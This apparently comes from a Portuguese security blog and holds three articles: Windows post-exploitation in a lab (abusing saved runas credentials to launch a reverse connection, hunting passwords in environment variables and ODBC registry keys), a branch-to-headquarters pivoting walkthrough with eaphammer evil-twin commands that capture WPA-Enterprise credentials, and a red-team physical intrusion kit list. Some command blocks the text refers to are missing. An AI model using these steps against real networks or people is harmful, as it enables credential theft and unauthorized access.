PÓS-EXPLORAÇÃO EM SISTEMAS WINDOWS

Neste artigo, iremos ver alguns meios de como realizar a pós-exploração ao ganhar acesso a uma máquina Windows.

O uso de ferramentas que automatizam a pós-exploração veem aumentando, como por exemplo, o uso do Mimikatz.

Entretanto, é possível realizar o bloqueio / detecção dessas ferramentas.

Portanto, eu separei de forma lógica, ao decorrer da minha carreira e dos meus estudos, alguns comandos que me ajudaram a realizar a pós-exploração em sistemas Windows.

Em meu lab, possuí um usuário chamado Carlos Silva (hackware.local\carlos.silva). Iremos trabalhar com o acesso a maquina dele.

Procurando arquivos .bat, .vbs e .ps1

Normalmente, esses arquivos são criados pela equipe do Suporte Técnico afim de automatizar alguma tarefa nas maquinas dos usuários. Para realizar essa busca, podemos utilizar o seguinte comando: 

C:\Users\carlos.silva\ > dir *.bat *.vbs *.ps1 /s

Esse comando realiza a busca dos arquivos com formatos bat, vbs e ps1 no diretório atual e nas subpastas presentes.

A saída do comando nos retornou dois arquivos:

• CollectSyncLogs.bat, proprietário do OneDrive.
• run.bat, vamos analisar. 

Podemos utilizar o comando more para visualizar o conteúdo dentro do arquivo run.bat:

Vamos entender o conteúdo do arquivo run.bat:

Podemos deduzir então, de forma clara, que o usuário pedro.bastos invoca o executável contabil.exe sem a necessidade de inserir a senha, pois já esta salva. Com isso, podemos executar o seguinte comando:

Como podemos ver, dessa vez o runas executa o arquivo pivoting.exe, que tem como objetivo estabelecer uma conexão reversa com a minha maquina (atacante). Resultado após executar o arquivo:

Dica: para visualizar as credenciais atualmente armazenadas, basta utilizar o comando cmdkey /list:

Variáveis de ambiente

Outro meio para se conseguir credenciais é checando as variáveis de ambiente presentes no sistema. Para encontrar variáveis que podem possuir senhas / logins, eu utilizo um comando para automatizar a busca. Esse comando lê um arquivo onde contem algumas palavras chaves, como por exemplo password, senha.  Vejamos a seguir: 

OBDC (Open Database Connectivity)

Sendo bastante utilizado para o acesso a sistemas gerenciadores de bancos de dados, muitas das vezes a configuração não é criptografada ao ser salva no Registros do Windows. Podemos explorar essa falha de segurança utilizando o seguinte comando a seguir: 

Comando utilizado no Powershell.

Entendendo o comando: 

• User DSN: HKEY_CURRENT_USER-> Software -> ODBC -> ODBC.INI -> DSNNAME
• System DSN: HKEY_LOCAL_MACHINE-> Software -> ODBC -> ODBC.INI -> DSNNAME

Conclusão

Conforme dito no inicio do artigo, o uso de ferramentas que automatizam a pós-exploração veem aumentando, mas estão cada vez mais difíceis de serem utilizadas em ambientes que possuem uma segurança mais rigorosa. O uso de comandos também estão cada vez mais sendo detectados, principalmente com o uso de Machine Learning.

Referenciais 

• Encrypting Passwords on ODBC DSN
• Windows - Privilege Escalation
• Cmdkey, Runas, Get-Item, Net User

PIVOTING: DA FILIAL PARA MATRIZ

Com o objetivo de mostrar a importância da segurança da informação em filiais, neste artigo irei abordar os seguintes tópicos:

• Ataques wireless;
• Descoberta de sub redes;
• Descoberta de hosts;
• Descoberta de serviços;

Para comprometer a infraestrutura de uma empresa, muitas das vezes os ataques cibernéticos tem como alvo as filiais, para realização de pivoting até a matriz.

Essa será a infraestrutura do lab demonstrando uma empresa:

• Dois firewalls fechando uma VPN site-to-site (filial <--> matriz);
• Usuário (filial) com notebook conectado em um roteador wireless;
• Um servidor (genérico) na matriz;

Acessando a rede da filial

O primeiro passo é conseguir acessar a rede da filial. Para isso, irei analisar a rede:

Tive como resultado os seguintes detalhes:

• SSID: Contoso
• Segurança: WPA & WPA2 Enterprise
• Autenticação: Radius

A rede wireless está configurada com um protocolo de segurança WPA & WPA2 Enterprise que funciona via servidor Radius. 

Sabendo disso, irei fazer um ataque do tipo Evil Twin com foco em redes wireless Enterprise.

Clonando o repositório da ferramenta de ataque eaphammer

$ : git clone https://github.com/s0lst1c3/eaphammer/

• Distro Kali: cd eaphammer/ && ./kali-setup
• Outras distros: https://github.com/s0lst1c3/eaphammer/wiki/Setup-Guide#i-kali-setup-instructions 

Pegando o BSSID da rede alvo

# Iniciando a placa de rede wifi em modo monitoramento 
$ : airmon-ng start wlan0

# Capturando redes wireless 5Ghz 
$ : airodump-ng wlan0mon -b a

Gerando certificado para rede alvo e realizando o ataque

# Gerando certificado com informações da empresa
$ : ./eaphammer --cert-wizard

 

# Criando AP falso
$ : ./eaphammer --bssid B0:BE:76:0E:E5:D8 --essid Contoso --channel 6 --auth wpa-eap --interface wlan0 --creds

 

Os clientes começarão a se desconectar da rede de destino e a se conectar ao meu AP.

Ao inserir as credenciais solicitadas e tentarem se conectar, os dados serão enviados para o atacante.

Acessando a rede e realizando descoberta de sub redes, hosts e serviços

Com acesso a rede, o objetivo agora é encontrar alguma rota para rede da matriz. Para conseguir isso, irei utilizar uma ferramenta chamada netdiscover, que tem como sua principal função a análise de rotas.

$ : netdiscover -L

Outros meios para se fazer a descoberta sub redes e hosts é utilizando o nmap ou fping:

$ : nmap -sP 172.16.0.0/24

$ : fping -s -g 172.16.0.1 172.16.0.50

Ao comprometer um dispositivo, também é possível realizar a descoberta de hosts consultando o arquivo hosts do sistema operacional:

Windows: System32\drivers\etc\hosts

Linux: /etc/hosts

MAC OS: /private/etc/hosts

 

Conclusão

Conforme vimos no decorrer do artigo, com um simples acesso a rede da filial é possível escalarmos até a rede da matriz. Segurança da informação é composta por pessoas, processos e tecnologias, ou seja, não basta comprar aquele firewall, SIEM, IPS ou antivírus de última geração se a estratégia de implementação, ciclo de vida, sustentação e resposta a incidentes não forem capazes de acompanhar a evolução de ameaças nos dias de hoje.

RED TEAM - TOOLKIT ESSENCIAIS

E ae galera, hoje trago um artigo traduzido sobre kits de ferramentas de avaliação de segurança física e red team.

As listas abaixo não pretendem ser abrangentes, mas uma referência rápida para kits de ferramentas específicos - que geralmente incluem dispositivos técnicos e ferramentas físicas.

Como sempre, supõe-se que você tenha permissão do seu cliente, tenha a documentação apropriada à mão e o escopo definido é sua principal consideração antes de tentar comprometer um recurso de destino. Por favor, certifique-se de que você tem muita experiência com ferramentas de desvio e bloqueio de picking, a fim de reduzir o risco de danificar portas, trancar núcleos e mecanismos, etc. Seja sempre responsável!

Ao decidir o que levar a uma avaliação, é importante entender a instalação, o tipo de indústria, os códigos de vestimenta, etc. Muitas vezes você pode não descobrir esse tipo de informação até que já esteja no local, por isso é importante que você chegue pelo menos no dia anterior a um compromisso para observar os pontos de entrada, funcionários e controles de acesso.

Tenha tempo suficiente para o reconhecimento, especialmente se houver mais de uma instalação de destino. A partir de observações no local, você pode precisar ajustar seu kit de ferramentas de acordo. Lembre-se que quanto mais leve for o kit, mais fácil será se mover e ficar discreto.

Ao chegar para a avaliação no local, é aconselhável que você não carregue uma mochila grande ou sua sacola militar tática super incrível. Aqui estão algumas considerações adicionais:

• Use uma bolsa que seja de cor neutra.
• NÃO caminhe com seus patches de hacker e pins por toda a sua bolsa ou adesivos por todo o seu laptop e equipamento - a menos que você pretenda se destacar de propósito.

Exemplos de kit de ferramentas:

 

 

• Lock picks (pocket) - commonly used picks
• Under-the-door tool
• Canned air, hand warmers (request-to-exit bypass, etc.)
• Shove knife/shrum tool
• Crash bar tool
• Dimple lock gun
• Tubular lock picks
• Fire/emergency elevator key set
• USB keylogger and Hak5 rubber ducky
• Hak5 LAN turtle
• Pineapple nano
• LAN tap
• Wafer and warded pick set
• Laptop or mobile device
• External hard drive
• Fake letter of authorization (as a plan B and to test incident response)
• Real letter of authorization
• Props for guises if utilizing social engineering
• RFID thief/cloner (something that is easy to hide - I often use a clipboard like the one shown in the picture above)
• Camera (or just use your smartphone)

Exemplos de kit de ferramentas #2:

• Lock picks (pocket) - common
• Lock picks (backpack) - expanded set
• Under-the-door tool
• Shove knife/shrum tool
• Crash bar tool
• Snap gun with interchangeable needles
• Dimple lock gun
• Tubular lock picks
• Hand warmers/canned air
• Leather gloves/good shoes
• Fire/emergency elevator key set
• USB keylogger and Hak5 rubber ducky
• Hak5 LAN turtle
• LAN tap
• Wafers and warded pick set
• Laptop if needed
• External hard drive
• Malicious drops x4 (USB, etc.)
• Rogue access point (PwnPlug, Pi, whatever your flavor of choice)
• Hak5 pineapple
• 15dbi wireless antenna (for outside, not really something you want to stuff in your bag inside).
• Nexus 7 with nethunter, TP-link adapter etc.
• Props for guises if utilizing social engineering
• Fake letter of authorization (as a plan B and to test incident response)
• Real letter of authorization
• RFID thief/cloner
• Camera (or just use your smartphone)
• Snake camera (a bonus for looking over drop ceilings or floors)
• Multi-tool

 

Outros

• Vários cabos USB c(A, B, mini, micro, OTG, etc.)
• SD Cards, microSD cards
• Smartphone (earpiece if with a team)
• Body camera (GoPro/ACE Cameras are sometimes handy with client approval)
• Extra power packs/batteries
• Small flashlight (low lumen)
• RTFM: Red Team Field Manual

Referencias e artigo oficial

https://technical.nttsecurity.com/post/102e2hp/red-team-toolkit-essentials

https://github.com/infosecn1nja/Red-Teaming-Toolkit

 www.sparrowslockpicks.com

https://shop.riftrecon.com/

https://www.wallofsheep.com/

 www.hackerwarehouse.com

 www.hak5.org